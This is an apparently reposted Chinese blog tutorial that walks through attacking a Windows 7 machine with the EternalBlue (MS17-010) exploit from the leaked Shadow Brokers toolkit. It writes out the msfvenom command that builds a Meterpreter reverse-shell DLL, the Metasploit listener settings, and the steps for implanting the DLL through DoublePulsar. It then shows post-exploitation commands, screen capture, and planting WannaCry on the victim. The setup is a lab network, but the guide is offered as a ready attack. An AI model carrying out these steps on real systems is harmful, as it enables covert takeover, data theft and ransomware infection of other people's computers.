漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010

一. 准备

- 靶机(被攻击电脑)
靶机我们只需要知道系统信息和IP,我这里开的是虚拟机win7,IP:192.168.1.110
漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第1张图片

- 攻击机(运行攻击程序)
攻击机用的是32位Windows XP sp3,IP:192.168.1.111,用来运行攻击程序,注入木马dll,运行永恒之蓝(eternalblue)需要安装Python2.6和pywin32-221

- 控制机(控制端)
这里用kalilinux虚拟机,IP:192.168.1.114,用来生成木马文件dll,生成攻击负载,控制被入侵的电脑

- 工具
shadowbroker-master,存放在攻击机中
漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第2张图片

二.生成dll文件

- 命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.114 LPORT=5555 -f dll>launcher.dll
漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第3张图片
- 将dll文件复制到攻击机,等待攻击机调用
复制到攻击机中随意位置,记住路径就行了后面会用到
漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第4张图片

三、kali控制端开启监听

  • kali终端输入:msfconsole启动metasploit
    metasploit启动图很经典,忍不住放多一张

    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第5张图片
    - 依次输入命令开启监听:
    set LHOST 192.168.1.114
    set LPORT 5555
    set payload windows/x64/meterpreter/reverse_tcp
    exploit

    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第6张图片

    四.运行攻击程序

    - 新建目录listeningposts
    切换至shadowbroker-master下Windows目录下新建listeningpost目录,否则后面调用运行.py程序会报错

  • 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第7张图片

    - 运行攻击程序fb.py
    将工具包中windows目录下的fb.py用cmd执行
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第8张图片

    - 设置程序参数
    输入靶机、攻击机IP地址,设置日志路径
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第9张图片

    - 使用永恒之蓝攻击:use eternalblue
    输入命令,默认回车即可

  • 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第10张图片
    攻击目标、模块选择FB
  • 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第11张图片
    看到这里就显示成功了
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第12张图片
    -利用doublepulsar植入生成的dll文件
    输入命令:use doublepulsar
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第13张图片
    选择SMB攻击、攻击机x64、选择RunDLL植入我们的木马程序、输入我们生成的dll文件路径
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第14张图片
    看到这个就植入dll木马成功了,攻击也结束了,回去看我们的控制端kali
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第15张图片

    五. 后期控制

    可以看到我们的kali控制端已经控制监听攻击机
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第16张图片
    可以看到这时靶机毫无反应
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第17张图片

  • 收集靶机信息
    输入命令:sysinfo获取靶机系统信息
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第18张图片
    输入命令:route获取路由信息
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第19张图片

  • 好玩的
    输入命令:screenshot抓取靶机桌面
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第20张图片
    其实到这里控制端已经是完全控制靶机,且靶机完全不知道……wannacry就是利用这工具漏洞整的
    shell得到和靶机一样的cmd命令窗口
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第21张图片
    向靶机植入wannacry病毒
    漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010_第22张图片

`

你可能感兴趣的:(工具类,渗透,漏洞)